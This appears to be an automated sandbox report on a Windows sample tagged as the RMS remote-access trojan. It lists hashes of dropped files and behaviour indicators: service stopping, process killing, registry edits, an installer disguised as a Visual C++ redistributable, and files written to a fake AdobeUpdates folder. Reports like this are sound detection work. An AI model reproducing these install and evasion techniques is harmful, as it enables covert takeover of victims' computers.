SHA512 1a7c49f172691bf071df0d47d6ee270afbfa889afb8d5bd893496277fd816630ecd7b50c978b53d88228922ba6070f382b959ffc389394e0f08daab107369931

C:\Windows\SysWOW64\sysfiles\msvcr90.dll

MD5 7538050656fe5d63cb4b80349dd1cfe3
SHA1 f825c40fee87cc9952a61c8c34e9f6eee8da742d
SHA256 e16bc9b66642151de612ee045c2810ca6146975015bd9679a354567f56da2099
SHA512 843e22630254d222dfd12166c701f6cd1dca4a8dc216c7a8c9c0ab1afc90189cfa8b6499bbc46408008a1d985394eb8a660b1fa1991059a65c09e8d6481a3af8

C:\Windows\SysWOW64\sysfiles\gdiplus.dll

MD5 871c903a90c45ca08a9d42803916c3f7
SHA1 d962a12bc15bfb4c505bb63f603ca211588958db
SHA256 f1da32183b3da19f75fa4ef0974a64895266b16d119bbb1da9fe63867dba0645
SHA512 985b0b8b5e3d96acfd0514676d9f0c5d2d8f11e31f01acfa0f7da9af3568e12343ca77f541f55edda6a0e5c14fe733bda5dc1c10bb170d40d15b7a60ad000145

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

memory/3900-429-0x00000000009E0000-0x00000000009E1000-memory.dmp

memory/744-430-0x0000000000A30000-0x0000000000B7A000-memory.dmp

memory/1380-431-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/408-432-0x0000000000920000-0x0000000000A6A000-memory.dmp

memory/688-433-0x00000000009B0000-0x0000000000AFA000-memory.dmp

C:\Windows\SysWOW64\sysfiles\rfusclient.exe

MD5 fd73724d0268dafcefb8b4061e4045b0
SHA1 8205f76d796577817d5f9c1ef735a229c69a215f
SHA256 cef753b98d114554b8d9b44d7a0062904f7da3165e79aa346c445e3a0f7805f2
SHA512 8c135e80c2e70a5abb2975ca1c9ba77c9093ba0f8cab1e19d80ac0ab6b8049009ba7739f3a30f69bb4d5374f80fe3cf7e8735c2249927721595f380e5307d96e

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\oledlg.dll

MD5 d3f47f9ef1d3c358446c3680021e98ac
SHA1 5c50ab5a79d770a1e5ad43378d69d218de3ec4e6
SHA256 52fdc5181c9de91bfce282955f921b1938caf40a7d1528131b5155a367585ede
SHA512 eb55db05f167b4a49f2d586c446ac993463b3755e567d1e2e6024fbd8d2c683ea4c537c91978676de7f34aa20bcf86d9cb35072345e29bc8f94ebbc1bf894b8f

\Windows\SysWOW64\sysfiles\msimg32.dll

MD5 51af730a69ae4d520bed1ef9b658e0f8
SHA1 d2fbeac55b43bc4503154c465a99e91f57f9cbd3
SHA256 1a1b2ae21c9ecd0d2fcf1098b9906b39d8c440dbb1165d2e5c3b1a8b03b071fe
SHA512 348803eeb31ecf767474bdc5831c0a89d0fbf5b35913ab40f673ef5c5ccc2e02fe823ee596b8ab7a0beca40d07d0841426064a42fc0ef5d91d12ae9869d07685

C:\Users\Admin\AppData\Local\Temp\wget.exe

MD5 bd126a7b59d5d1f97ba89a3e71425731
SHA1 457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256 a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA512 3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

C:\Users\Admin\AppData\Local\Temp\wget.exe

MD5 bd126a7b59d5d1f97ba89a3e71425731
SHA1 457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256 a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA512 3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd

MD5 af74ff71f11cec559a5aaee9a41c9710
SHA1 0df60a0511d2ae122a8e5b736efda1bdf0bee41d
SHA256 66a1f91373099569c354e909757faac87a5d6f00bc7fdd3d9a85e4324bae9a80
SHA512 e8f8b566c9116c42d57dbe6edf20b76b96976f7e5f7c9ba766a6d3e7aa4b49404bb66456e56d25c6623d5a2a963cec19e0dc4a7caa6ed3fe22074b747dffd5e9

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-28 15:19

Reported

2022-01-28 16:02

Platform

win7-en-20211208

Max time kernel

146s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe"

Signatures

RMS

trojan rat rms

Stops running service(s)

evasion

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\550ee89d5df17f90ba7689d957cd067dcdbe3d957c5369ea28d925e02ccc8ce6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\sysfiles\msimg32.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcr90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\ripcserver.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8decoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\gdiplus.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\oledlg.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\vp8encoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisdecoder.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rasadhlp.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rwln.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\microsoft.vc90.crt.manifest C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\msvcp90.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rfusclient.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SysWOW64\sysfiles\rutserv.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\SysWOW64\RWLN.dll C:\Windows\SysWOW64\sysfiles\rutserv.exe N/A
File created C:\Windows\SysWOW64\sysfiles\dsfvorbisencoder.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\AdobeUpdates\group.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\AdobeUpdates\id.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f762c9c.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f762c9c.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f762ca0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f762c9e.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\comp.txt C:\Windows\SysWOW64\cmd.exe N/A
File created C:\Windows\Installer\f762c9e.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI31EA.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{AB7AA605-500F-4153-8207-FB5563419112}\ARPPRODUCTICON.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2DA5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\AdobeUpdates\mac.txt C:\Windows\SysWOW64\cmd.exe N/A

Launches sc.exe

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Language = "1049" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Version = "97648640" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\1 = "DISK1;1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921\Remote_Office_Manager C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductName = "Microsoft Visual C++ 2008 Redistributable - x86 10.0.743894.2047" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\PackageCode = "558594499A0F7BE41A10BED2C55AA173" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\ProductIcon = "C:\\Windows\\Installer\\{AB7AA605-500F-4153-8207-FB5563419112}\\ARPPRODUCTICON.exe" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\506AA7BAF00535142870BF5536141921 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\PackageName = "rms5.2.1.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\506AA7BAF00535142870BF5536141921\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: SetClipboardViewer

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sysfiles\rfusclient.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
